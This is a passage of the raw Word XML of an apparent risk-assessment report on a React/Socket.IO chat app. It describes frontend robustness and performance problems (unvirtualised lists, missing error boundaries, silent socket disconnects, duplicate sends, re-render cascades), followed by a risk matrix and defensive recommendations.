      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.map()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop directly into the browser DOM:</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ScrollableChat.js:</w:t>
        <w:br/>
        <w:t>{messages &amp;&amp;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  messages.map((m, i) =&gt; (</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;div style={{ display: "flex" }} key={m._id}&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      {(isSameSender(messages, m, i, user._id) ||</w:t>
        <w:br/>
        <w:t xml:space="preserve">        isLastMessage(messages, i, user._id)) &amp;&amp; (</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;Tooltip label={m.sender.name} placement="bottom-left" hasArrow&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">          &lt;Avatar mt="7px" mr={1} size="sm" src={m.sender.pic} /&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &lt;/Tooltip&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">      )}</w:t>
        <w:br/>
        <w:t xml:space="preserve">      &lt;span style={{ ... }}&gt;{m.content}&lt;/span&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ))}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every single message in the conversation creates multiple DOM elements, Chakra UI Tooltips, and Avatar image components. In an active group conversation with 2,000 to 10,000 messages: - The browser must maintain tens of thousands of active DOM nodes in memory. - Memory consumption in Chrome/Edge spikes beyond 1 GB RAM for a single tab. - Frame rates drop severely during scrolling (jank), leading to browser unresponsiveness or the fatal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Aw, Snap! Out of Memory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab crash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability B — Unhandled Application State Crashes (Missing React Error Boundaries):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/src/Context/ChatProvider.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</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ChatProvider.js, line 14:</w:t>
        <w:br/>
        <w:t>const userInfo = JSON.parse(localStorage.getItem("userInfo"));</w:t>
        <w:br/>
        <w:t>setUser(userInfo);</w:t>
        <w:br/>
        <w:t>if (!userInfo) history.push("/");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The application assumes that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage.getItem("userInfo")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or perfectly formatted JSON. If the stored string becomes corrupted, or if an unhandled rendering error occurs anywhere inside deeply nested child components: - The application crashes entirely with an uncaught runtime exception. - Because there is no top-level React </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Error Boundary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>componentDidCatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), the React component tree unmounts completely. - The user is presented with a completely blank white screen ("White Screen of Death") with zero explanatory feedback or recovery mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability C — Silent WebSocket Disconnection &amp; Lack of Offline Feedback:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frontend/src/components/SingleChat.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, Socket.IO is initialized, but connection lifecycle events (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>connect_error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reconnect_attempt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disconnect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) are not bound to any persistent user-facing indicator:</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SingleChat.js:</w:t>
        <w:br/>
        <w:t>useEffect(() =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket = io(ENDPOINT);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.emit("setup", user);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.on("connected", () =&gt; setSocketConnected(true));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.on("typing", () =&gt; setIsTyping(true));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  socket.on("stop typing", () =&gt; setIsTyping(false));</w:t>
        <w:br/>
        <w:t xml:space="preserve">  // Missing listeners: connect_error, reconnecting, disconnect</w:t>
        <w:br/>
        <w:t>}, []);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>If the client loses internet connectivity or the backend restarts: - The UI maintains a phantom "Connected" visual appearance. - The user continues typing and submitting messages, unaware that their socket transport is broken. - Messages silently fail to broadcast, and real-time counterpart updates cease without any warning banner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability D — Unthrottled Input Submissions &amp; Duplicate Message Spams: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SingleChat.js, lines 70-80:</w:t>
        <w:br/>
        <w:t>const sendMessage = async (event) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (event.key === "Enter" &amp;&amp; newMessage) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.emit("stop typing", selectedChat._id);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const config = { headers: { ... } };</w:t>
        <w:br/>
        <w:t xml:space="preserve">      setNewMessage("");</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const { data } = await axios.post("/api/message", { ... }, config);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      socket.emit("new message", data);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      setMessages([...messages, data]);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    } catch (error) { ... }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The input field does not implement debouncing, throttling, or a temporary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state during the in-flight asynchronous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>axios.post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> call. Under high network latency (2G/3G or slow WiFi), a user repeatedly pressing "Enter" triggers multiple simultaneous HTTP POST requests, creating duplicate messages in the database and timeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability E — Global Context Re-Render Cascades:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The entire application state is stored in a single monolithic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ChatContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ChatProvider.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without granular memoization (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>React.memo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>useMemo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>useCallback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">): - Any mutation to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>selectedChat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>notification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>chats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggers an immediate re-render of the entire component tree (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SideDrawer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MyChats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ChatBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and all sub-dialogs). - During rapid real-time typing indicators or incoming message bursts, this re-render cascade causes perceptible UI stutter and input lag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.3 Threat Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. A user participates in a high-volume group chat that has accumulated 5,000 messages. 2. The user navigates to the group; the browser attempts to construct 25,000+ DOM nodes at once. 3. The browser tab freezes for 4-6 seconds; scrolling causes severe frame stutter. 4. Meanwhile, a brief Wi-Fi hiccup drops the WebSocket connection. 5. Because there is no offline banner, the user types a critical message and presses Enter 4 times due to visual lag. 6. When the connection re-establishes, 4 duplicate messages are submitted to the server. 7. If any malformed avatar URL fails to parse, the entire interface crashes into a blank white screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.4 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">- React's virtual DOM minimizes direct DOM writes for small-to-moderate component trees. - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>react-scrollable-feed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides automatic smooth scrolling to the bottom of the message container. - Chakra UI provides consistent styled components with basic responsive layouts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>8.5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Virtual Scrolling (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>react-window</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>@tanstack/react-virtual</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w: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Implement Top-Level and Component-Level React Error Boundaries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Add Global Connection Status Banner ("Connecting / Offline") via Socket.IO events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Add Request In-Flight Lock / Debounce on message submission</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Decompose </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ChatContext</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and apply </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>React.memo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to prevent re-render cascades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Add </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>word-break: break-word</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and text overflow truncation guards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bl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. Risk Summary Matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following matrix provides a consolidated view of all 7 identified risk areas, their severity assessments, and current mitigation status:</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Risk Area</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Likelihood</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Impact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Severity</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Current Mitigation Status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1</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Authentication &amp; Session Security</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Critical</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High</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Partial — JWT signature verification exists, but storage in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>localStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and CORS policy are vulnerable</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2</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Socket.IO Event Integrity</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High</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Minimal — No authentication on socket layer; REST endpoints protected but socket events are unauthenticated</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3</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In-Memory State Volatility</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None — No persistence layer for presence data; relies on client reconnection; state lost on restart</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4</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Data Integrity &amp; Consistency</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Medium</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Partial — Atomic operators used consistently, but no schema-level constraints or message pagination</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5</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Scalability Constraints</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None — Single-process architecture; no clustering, caching, or horizontal scaling mechanisms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6</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Input Validation &amp; Error Handling</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Low</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Partial — Framework defaults (async handler, React escaping) provide baseline protection</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7</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Frontend Architecture &amp; UX Resilience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Medium-High</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Minimal — Unvirtualized DOM list, missing Error Boundary, no disconnect banner, context re-render cascade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. Prioritized Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Based on the full-stack risk analysis above, the following recommendations are ordered by priority for implementation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.1 Immediate Priority (Security-Critical)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement Socket.IO authentication middleware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Verify JWT tokens on WebSocket connection establishment to prevent identity spoofing (addresses Risk Areas 1 &amp; 2). 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Restrict CORS to specific origins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the actual frontend domain (addresses Risk Area 1). 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Migrate JWT storage to httpOnly cookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Eliminate localStorage-based token storage to prevent XSS-based token theft (addresses Risk Area 1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 High Priority (Data Protection &amp; Client Stability)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement message pagination (Backend) &amp; Virtual Scrolling (Frontend)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Combine cursor-based API pagination with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>react-window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to bound DOM nodes and memory to O(1) viewport size (addresses Risk Areas 4, 5, &amp; 7). 5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement React Error Boundaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
